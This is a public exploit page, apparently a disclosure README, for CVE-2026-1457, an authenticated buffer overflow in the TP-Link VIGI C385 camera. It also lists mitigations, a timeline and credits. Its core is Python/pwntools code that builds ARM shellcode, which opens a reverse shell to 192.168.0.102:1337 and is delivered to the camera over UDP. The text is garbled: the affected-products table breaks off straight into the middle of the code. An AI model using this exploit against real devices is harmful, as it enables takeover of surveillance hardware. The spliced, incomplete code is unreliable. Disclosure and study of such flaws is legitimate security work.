Share
## https://sploitus.com/exploit?id=CC1D56AF-F7B8-5203-9C59-616C8951D3A5
# CVE-2026-1457: TP-Link VIGI C385 Authenticated Remote Code Execution

## Overview

CVE-2026-1457 is an authenticated buffer overflow vulnerability in the web API of TP-Link VIGI C385 V1. This vulnerability allows authenticated attackers to perform remote code execution (RCE).

**CVSS v4.0 Score: 8.5 (High)**

**CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N**

## Affected Products

| Product Model | Affected Version |
|--------------|-----------------|
| VIGI C385 V1 |  syscall 114 (ARM)
        """ + shellcraft.syscall(114) + """
        // connect + dupsh
        """ + shellcraft.thumb.linux.connect('192.168.0.102', 1337) + \
            shellcraft.thumb.linux.dupsh() + """
        b the_end

    parent:
        mov r0, #0
        mov r7, #1      // sys_exit
        svc #0

    the_end:
    """

    payload = asm(sc_asm)

    SERVER_HOST = '192.168.0.100'
    SERVER_PORT = 20002
    SERVER = (SERVER_HOST, SERVER_PORT)

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(payload, SERVER)
    sock.close()

    print(asm(sc_asm).hex())
    print(f"[+] Sent {len(payload)} bytes of ARM shellcode to 192.168.0.100:20002")

send_shellcode()
time.sleep(1)
buffer_overflow()
```

### Exploitation Result

The following screenshot demonstrates successful exploitation resulting in a reverse shell connection:

![Reverse Shell Success](image.webp)

## Mitigation

### Recommended Actions

1. **Firmware Update**: Update affected devices to version **3.1.1 Build 251124 Rel.50371n** or later.

2. **Network Isolation**: If possible, place VIGI C385 devices in an isolated network segment.

3. **Access Control**: Restrict access to the management interface to trusted networks only.

4. **Monitoring**: Monitor for abnormal network traffic or device behavior.

### Temporary Mitigation Measures

- Block external access to the web management interface.
- Use strong authentication credentials.
- Disable unnecessary network services.

## Timeline

- **2026-01-XX**: Vulnerability discovered
- **2026-01-XX**: Vulnerability reported to TP-Link
- **2026-01-29**: Security advisory published
- **2026-01-29**: Public disclosure

## References

- [TP-Link Security Advisory](https://www.tp-link.com/support/security-advisory/)
- CVE-2026-1457

## Disclaimer

This information is provided for educational and security research purposes only. The use of this information for malicious purposes is strictly prohibited. The authors assume no responsibility for any misuse of this information.

## License

This project is provided for educational and security research purposes only.

## Credits

This vulnerability was discovered and analyzed by:

- SeonGoo Lee (classun9)
- MinSeong Kim (ii4gsp)

of NSHC RedAlert Labs

---

**โš ๏ธ Warning**: This vulnerability can allow remote code execution on actual devices. Please use this information responsibly in accordance with responsible disclosure principles.